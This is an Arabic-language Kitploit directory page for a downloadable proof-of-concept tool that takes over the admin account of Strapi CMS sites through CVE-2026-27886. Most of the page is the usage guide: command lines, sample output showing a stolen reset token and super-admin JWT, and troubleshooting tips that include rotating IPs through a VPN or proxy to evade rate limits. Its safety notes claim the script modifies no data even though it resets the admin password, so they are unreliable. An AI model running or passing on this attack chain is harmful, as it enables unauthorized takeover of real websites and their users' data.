Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-27886-PoC-Account-Takeover — إثبات مفهوم كامل للاستيلاء على الحساب لـ CVE-2026-27886 في Strapi CMS | Kitploit
أدوات/GitHubGitHub/thesw0rd/cve-2026-27886-poc-account-takeover
الاستطلاعهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubthesw0rd/cve-2026-27886-poc-account-takeover

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-27886-PoC-Account-Takeover

إثبات مفهوم كامل للاستيلاء على الحساب لـ CVE-2026-27886 في Strapi CMS

عرض المستودع
23منذ 3 أشهرلم تتم المراجعة بعد

CVE-2026-27886 استغلال آلي - دليل الاستخدام

ما يفعله هذا السكريبت

يقوم بأتمتة سلسلة الاستيلاء الكامل على الحساب عبر 4 مجموعات من طلبات HTTP:

  1. التحقق من الثغرة - تأكيد أن الهدف ضعيف
  2. تعداد البريد الإلكتروني - استخراج بريد المسؤول عبر مؤشر بوليني (~500 طلب)
  3. تشغيل إعادة تعيين كلمة المرور - بدء عملية استعادة كلمة المرور في Strapi
  4. سرقة الرمز المميز - استخراج رمز إعادة التعيين المكون من 40 حرفاً (~320 طلب)
  5. الاستيلاء على الحساب - استخدام الرمز المسروق للحصول على JWT مدير فائق

الاستخدام الأساسي

وضع التحقق فقط (آمن)

التحقق مما إذا كان الهدف ضعيفاً دون استغلال:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles --verify-only

الاستغلال الكامل (الأسرع)

أتمتة كل شيء إذا كنت لا تعرف البريد الإلكتروني للمسؤول:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles

المخرجات:

root@kitploit:~
[+] Target: https://target/api/articles
[+] Base URL: https://target
[*] Verifying vulnerability...
    [+] Vulnerable: baseline=12, where_test=0
[*] Enumerating admin email...
    [email protected]
[*] Triggering password reset for [email protected]...
    [+] Password reset triggered (HTTP 204)
[*] Extracting 40-char reset token...
    [100%] d1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a
[*] Resetting password with stolen token...
    [+] Password reset successful!
    [+] JWT: eyJhbGciOiJIUzI1NiIs...
    [+] User: [email protected] (ID: 1)

[+] SUCCESS! Admin account compromised.
[+] JWT Token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

تخطي تعداد البريد الإلكتروني (أسرع)

إذا كنت تعرف البريد الإلكتروني للمسؤول بالفعل (يوفر ~500 طلب):

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected]

كلمة مرور مخصصة

تعيين كلمة مرور مخصصة بدلاً من الافتراضية:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected] \
  --password "MyPassword123!"

إضافة تأخيرات (لتجنب حدود السرعة)

إذا كان الهدف يفرض حدوداً للسرعة:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --delay 0.1

يضيف هذا 100ms بين كل طلب (~2-3 دقائق للاستغلال الكامل).

URL أساسي صريح

إذا كانت نقاط النهاية /admin/* على مضيف مختلف:

root@kitploit:~
./cve-2026-27886-exploit.py https://api.target/articles \
  --base-url https://admin.target

المشاكل الشائعة

"استجابة غير JSON"

  • نقطة نهاية خاطئة (ليست مجموعة واجهة برمجة محتوى Strapi)
  • جرب: https://target/api/products، https://target/api/articles، إلخ.

"فشل تعداد البريد الإلكتروني"

  • المجموعة فارغة (لا توجد مفاتيح خارجية updated_by_id)
  • دور المسؤول لا يتطابق مع أي شخص في قاعدة البيانات
  • جرب نقطة نهاية مختلفة إذا كانت موجودة متعددة

"فشل استخراج رمز إعادة التعيين"

  • لم يتم تشغيل إعادة تعيين كلمة المرور
  • بريد إلكتروني للمسؤول مختلف عن الذي تم تخمينه
  • الرمز منتهي الصلاحية (حاول مرة أخرى، صلاحيته ~24 ساعة افتراضياً)

التعرض لحدود السرعة

  • أضف --delay 0.05 أو أكبر
  • أو استخدم VPN/وكيل لتدوير عناوين IP

ملاحظات أمنية

هذا السكريبت:

  • ✅ يقوم فقط بعمل طلبات GET/POST (لا تعديل بيانات)
  • ✅ يستهدف فقط تجاوز معامل استعلام Strapi الضعيف
  • ✅ يستخدم نقاط نهاية إعادة تعيين كلمة المرور الأصلية في Strapi
  • ✅ لا يترك أي آثار مخزنة على الهدف
  • ⚠️ صاخب جداً - يقوم بأكثر من 800 طلب متسلسل (واضح في السجلات)
تنزيل الأداة